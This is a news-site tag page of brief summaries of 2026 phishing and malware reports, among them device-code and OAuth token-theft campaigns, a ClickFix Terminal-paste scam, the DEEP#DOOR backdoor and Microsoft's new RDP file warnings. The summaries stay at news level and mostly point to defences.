All articles tagged with #phishing
GTA 6’s release hype has outpaced official pre-orders, leading to a wave of scams that promise free codes, beta keys, or exclusive trailers and deliver malware via fake installers and phishing sites. NordVPN Threat Intelligence found clone sites and trojan Android adware targeting fans, emphasizing that only official channels should be trusted for GTA 6 information and access.
The FBI issued a PSA about Kali365, a phishing‑as‑a‑service that exploits Microsoft’s OAuth device-code flow to hijack Entra and Microsoft 365 accounts, stealing session tokens and bypassing MFA. Kali365, distributed via Telegram, provides AI‑generated phishing lures, automated campaigns, and real‑time dashboards, with two attack modes: device‑code phishing and a Cookie Link adversary‑in‑the‑middle. Arctic Wolf observed global campaigns targeting Microsoft 365 environments, including creating malicious inbox rules and registering new devices. The FBI urges blocking device‑code authentication with Conditional Access, auditing usage, reporting incidents to IC3, and preserving phishing emails and suspicious activity. Device-code phishing has surged in 2026, with other PhaaS tools like EvilTokens and Tycoon2FA using similar methods.
Security researchers flag BasedApparel.com, Kash Patel’s apparel site, for hosting a ClickFix-style scam that shows a fake Cloudflare warning on macOS and instructs users to copy-paste a Terminal command. The copied text decodes to a hidden shell script that downloads malware capable of stealing browser credentials and crypto-wallet data, exfiltrating it to a hacker-controlled domain. The attack highlights how compromised legitimate sites can deliver infostealers via scareware, and Apple has added protections in macOS 26.4 against pasted Terminal commands; Based Apparel did not comment.
Researchers from Infoblox traced a thriving underground market that sells iPhone unlocking tools and phishing kits on Telegram and other services, linking dozens of groups to more than 10,000 phishing domains; unlocked stolen devices can fetch hundreds to thousands of dollars, incentivizing a supply chain that can let criminals access bank and crypto accounts via social engineering—even as Apple hardens Find My and other protections.
Microsoft disclosed a large-scale credential-stealing phishing campaign that targeted more than 35,000 users across 26 countries (92% in the U.S.), with victims in healthcare, financial services, and other sectors. Attackers used polished, enterprise-style emails about code-of-conduct reviews, sent via legitimate email services, and embedded PDFs that led to an AiTM (adversary-in-the-middle) phishing flow to harvest Microsoft credentials and tokens and bypass MFA. Victims encounter CAPTCHA checks and multiple intermediate pages before a final sign-in page, with the destination differing by device. The report also highlights rising QR-code phishing, ongoing BEC activity, and Tycoon 2FA PhaaS infrastructure shifting hosting to evade defenses, alongside two notable Q1 campaigns and a broader surge in phishing threats (about 8.3 billion from Jan–Mar 2026).
Security researchers describe ConsentFix v3, an automated phishing workflow that exploits the OAuth2 authorization code flow to steal tokens and hijack Microsoft/Azure accounts. The campaign uses Pipedream as the automation engine, hosts a spoofed Microsoft login on Cloudflare Pages, and exfiltrates the OAuth code to immediately exchange it for tokens, enabling access to emails and files even with MFA. Mitigations include token binding, behavioral detection rules, and app authentication restrictions; it remains unclear how widely this variant is being adopted.
A Vietnamese-linked operation hijacks Facebook accounts by using Google AppSheet as a phishing relay, targeting Business account owners to capture credentials and 2FA data, with roughly 30,000 victim records spread across several clusters (Netlify, CAPTCHA-gated pages, and Canva-generated PDFs) that feed the stolen data to Telegram channels and facilitate resale on underground markets; the campaign illustrates evolving tactics and the repurposing of trusted platforms in a dark, criminal economy.
Security researchers uncovered DEEP#DOOR, a Python-based backdoor that embeds its payload in a dropper and gains persistence via Startup scripts, Run keys, Scheduled Tasks, and optional WMI subscriptions. It uses a Rust-based tunneling service (bore.pub) for C2 and offers full RAT capabilities—reverse shell, reconnaissance, keylogging, screen/audio capture, webcam access, and credential theft from browsers, cloud services, and Windows Credential Manager—while employing anti-analysis and defense-evasion techniques. Distribution appears phishing-based and targeted, with a modular, fileless design; it could be repurposed by different actors.
Microsoft warns of a bug where the new security warnings shown when opening Remote Desktop (RDP) files can render with unreadable text and misaligned buttons when multiple monitors use different display scaling, affecting Windows 11/10/Server after the April 2026 updates. The prompt appears before connecting and shows signer status and resource redirections; the issue follows increased attacker use of RDP in phishing campaigns (e.g., APT29).
UNC6692 runs a multistage intrusion that begins with mass email bombardment and escalates via impersonation of IT staff in Microsoft Teams, guiding victims to a phishing landing page hosted on AWS S3. The campaign then harvests credentials, deploys a modular malware suite (SNOWBELT), and uses cloud-based C2 and data staging to exfiltrate data and compromise domain controllers, highlighting the need to restrict external Teams access and monitor cloud egress and browser extensions for anomalous activity.
A phishing campaign uses legitimate Apple account-change emails to push a fake iPhone purchase alert, embedding the scam text into user-provided Apple ID name fields so the message appears authentic; when recipients call the supplied number, they risk remote access or data theft. The emails pass SPF/DKIM/DMARC, and are delivered from Apple infrastructure, highlighting how attackers abuse legitimate features to bypass filters. Users should be wary of unexpected purchase notices and verify changes via official Apple channels.
Threat actors are abusing exposed n8n webhooks to run phishing campaigns, delivering malware via CAPTCHA-triggered downloads and fingerprinting victims, enabling persistence through modified RMM tools and C2 communication.
Microsoft’s April 2026 updates for Windows 10 and Windows 11 add protections to curb phishing by malicious Remote Desktop (.rdp) files: first-open triggers educate users, and subsequent attempts show a security dialog listing the file’s publisher status, remote address, and local resource redirects with all options off by default. If unsigned, a caution label appears; if signed, the publisher is shown but verification is still encouraged. These protections apply only to opening RDP files, not to connections via the Windows Remote Desktop client, and can be temporarily disabled via a registry setting by admins. Microsoft urges keeping the safeguards enabled, noting that attackers have used rogue RDP files in campaigns (e.g., APT29) to steal data, credentials, or even clipboard contents and smart-card authentication.
This week’s security recap flags a widespread Adobe Acrobat Reader zero-day (CVE-2026-34621) under active exploitation, AI-enabled vulnerability discovery and exploit tooling (Anthropic Mythos), and a wave of state-sponsored and criminal activity—from Iran- and North Korea-linked campaigns targeting ICS and crypto infrastructure to fileless malware, new RATs, and a Windows kernel rootkit (RegPhantom). It also highlights fiber-optic eavesdropping research, a major botnet takedown, and notable security tools and frameworks (MITRE F3, Betterleaks, etc.). Patch quickly, monitor for AI-driven threats, and watch for phishing and supply-chain risks.
Phishing emails impersonating Apple warn that iCloud storage is full and threaten immediate deletion unless users upgrade, guiding victims to malicious links designed to steal bank details. Which? warned of the scam, which resembles legitimate messages and uses dubious sender addresses and grammar. Do not click any links—verify storage via Settings, report suspected phishing, and contact your bank if details were shared.